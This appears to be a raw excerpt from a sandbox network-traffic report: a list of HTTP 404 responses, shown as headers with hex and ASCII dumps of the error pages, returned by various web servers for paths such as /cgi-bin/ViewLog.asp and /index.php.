        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 07:11:15 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:12:02 GMTServer: ApacheContent-Length: 258Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at 192.168.0.14 Port 80</address></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 03:12:12 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Sun, 16 Aug 1998 21:41:41 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Sat, 14 May 2022 00:25:51 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveKeep-Alive: timeout=60Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:56:02 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=iso-8859-1Content-Length: 336Server: Jetty(9.4.20.v20190813)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 72 65 3e 3c 2f 70 3e 3c 68 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 63 6c 69 70 73 65 2e 6f 72 67 2f 6a 65 74 74 79 22 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 20 39 2e 34 2e 32 30 2e 76 32 30 31 39 30 38 31 33 3c 2f 61 3e 3c 68 72 2f 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> Not Found</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.4.20.v20190813</a><hr/></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Sat, 14 May 2022 00:12:23 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Transfer-Encoding: chunkedContent-Encoding: gzipVary: Accept-EncodingDate: Sat, 14 May 2022 00:12:24 GMTData Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 00 0d 0a 31 38 62 0d 0a b5 93 6f 6b db 30 10 c6 bf ca 2d 7d b3 41 65 d7 ce 9f d2 44 13 64 74 90 17 85 96 cd 0c f6 f2 6c 5f 62 51 db f2 24 79 69 1a f2 dd ab 58 49 13 68 a0 1b 34 af 74 9c ee 7e 7a 24 3d c7 0b 5b 95 82 17 84 b9 e0 56 da 92 c4 b4 c1 ac 20 48 54 95 a1 0d 47 c1 55 10 df 00 83 ef 5a 2b 0d 9a 1a a5 2d 0f 7d 29 37 76 b5 5d 3e 31 36 8b 60 3d 57 b5 65 73 ac 64 b9 1a 27 58 a8 0a 2f a7 5a 62 79 69 b0 36 cc 90 96 f3 49 a6 4a a5 c7 cb 42 5a 9a a4 98 3d 2e b4 6a eb 9c f9 f4 c5 30 1e de 5e 8f 26 1d c8 c8 67 1a c7 71 f3 34 d9 c0 2c 3e 0b 3d 1a 79 7a ff 3c f4 41 47 ff 76 7f fb fb 7f f8 69 e9 d0 6f f9 fe 58 87 fb 40 ad 1b 78 f8 37 da 81 b0 43 1e 4b 3d ba 71 f7 5b 53 58 77 db 30 06 5f b0 99 06 35 56 f4 26 3d fb 71 48 bd 4a 62 4c f0 d0 fb 0a 78 e8 8d 99 aa 7c e5 4c 1a 89 59 92 3c c0 4f 8b b6 35 30 b8 1a 38 5b 86 d9 42 b2 54 d6 e1 2f 49 cb 3b b5 08 d0 34 ae 2d 12 dc d1 b7 a2 be f6 a2 1e d4 ca 14 98 bb 78 17 f4 04 6f 1c 56 d8 55 43 3c 4c c5 9e b9 b7 77 b3 db af c8 18 5c f8 12 de 8a d3 87 b5 e2 d0 90 93 c9 b4 6c ac 54 f5 be 29 71 c3 a4 e9 4f 4b c6 52 ee 22 a3 5a 9d 11 7c 3e 05 fb 02 d2 38 b1 16 f0 2f ca 12 d3 92 82 57 fe 3b f7 29 fa 27 27 d7 bd 45 df f5 fb 17 0c bb 69 7f 01 c8 38 48 8e f4 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a18bok0-}AeDdtl_bQ$yiXIh4t~z$=[V HTGUZ+-})7v]>16`=Wesd'X/Zbyi6IJBZ=.j0^&gq4,>=yz<AGvioX@x7CK=q[SXw0_5V&=qHJbLx|LY<O508[BT/I;4-xoVUC<Lw\lT)qOKR"Z|>8/W;)''Ei8H0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:17:49 GMTAccept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:17:52 GMTAccept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:12:38 GMTConnection: Close
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:12:38 GMTServer: Apache/2.2.3 (CentOS)Last-Modified: Thu, 17 Sep 2015 21:58:56 GMTETag: "21411-589-85852800"Accept-Ranges: bytesContent-Length: 1417Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:12:31 GMTServer: ServerX-Frame-Options: SAMEORIGINContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:12:31 GMTServer: ServerX-Frame-Options: SAMEORIGINContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:12:31 GMTServer: ServerX-Frame-Options: SAMEORIGINContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:12:31 GMTServer: ServerX-Frame-Options: SAMEORIGINContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:12:31 GMTServer: ServerX-Frame-Options: SAMEORIGINContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:12:31 GMTServer: ServerX-Frame-Options: SAMEORIGINContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48CONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>
